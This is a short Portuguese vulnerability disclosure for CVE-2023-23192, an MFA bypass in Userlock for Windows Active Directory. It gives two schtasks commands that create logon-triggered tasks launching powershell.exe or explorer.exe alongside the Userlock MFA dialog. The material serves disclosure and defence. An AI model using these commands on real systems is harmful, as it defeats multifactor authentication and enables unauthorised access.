
CVE-2023-23192
Descrição: Userlock é uma solução de Autenticação Multifator para ambientes Windows Active Directory & Cloud para impedir acesso não autorizado e indesejado. Ele permite autenticação personalizada de dois fatores (2FA) no logon do Windows, Área de Trabalho Remota (RDP & RD Gateway), IIS, VPN e Aplicações Cloud. O Userlock permite implementar MFA nos logons do Active Directory em estações de trabalho e servidores associados ao domínio. Uma caixa de diálogo é exibida onde você pode inserir o código OTP do aplicativo Autenticador no primeiro logon do dia em sua estação de trabalho. O Userlock integra-se ao processo de logon para fornecer autenticação de dois fatores.
Uma das estratégias mais comumente exploradas por atores de ameaças para estabelecer persistência no computador de uma vítima é o agendamento de tarefas. O adversário frequentemente usa essa estratégia para evitar detecção automatizada, manter persistência e realizar ataques surpresa após longos períodos de inatividade.
Vulnerabilidade:
Crie uma tarefa agendada que seja executada após o logon de qualquer usuário.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

Após efetuar logon com sucesso usando as credenciais de domínio, o cmd.exe agendado é exibido junto com a caixa de diálogo MFA do Userlock.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"